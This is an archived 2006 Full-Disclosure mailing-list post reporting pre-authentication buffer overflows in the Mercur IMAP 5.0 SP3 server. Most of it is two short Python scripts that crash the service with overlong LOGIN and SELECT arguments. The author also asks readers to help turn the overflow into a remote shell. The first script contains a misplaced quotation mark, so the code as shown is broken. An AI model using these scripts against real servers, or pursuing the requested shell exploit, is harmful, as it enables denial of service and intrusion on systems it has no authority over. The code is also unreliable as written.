| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <5746.1142544644@www099.gmx.net>
Date: Thu Mar 16 21:31:20 2006
From: Tim.Taylor at gmx.ch (Tim Taylor)
Subject: Mercur IMAPD 5.0 SP3 DoS Exploit or more?
Hi folks,
I found this bugs in a imap-server called Mercur IMAP 5.0 SP3 from
http://www.atrium-software.com/, but i was not able to exploit it successful
for a remote shell on WinXP ServicePack2. The program has an intern check
for the string length or something like that. I can overwrite the EIP
successfully but can not put my shellcode behind the EIP. Because of this
fact i have to write the shellcode in front of the EIP and this results in a
135 byte for the shellcode without the required "a login" or "a select".
Perhaps someone has a clue and can solve this problems and teach me some
lessons for the future.
-- DoS Exploit --
# Atrium Mercur IMAP 5.0 SP3 DoS Exploit
# pre authentifcation buffer overflow in imap command login
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login "\x41" * 275 + "\r\n")
# buffer overflow in imap commands like select and others
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login test test\r\n")
print s.recv(256)
s.send("a002 select " + "\x41" * 239 + "\r\n")
By the way at the first look it seems to be like some older bugs of this
piece of software but I do not think so.
Cheers
Tim Taylor
--
Bis zu 70% Ihrer Onlinekosten sparen: GMX SmartSurfer!
Kostenlos downloaden: http://www.gmx.net/de/go/smartsurfer
Powered by blists - more mailing lists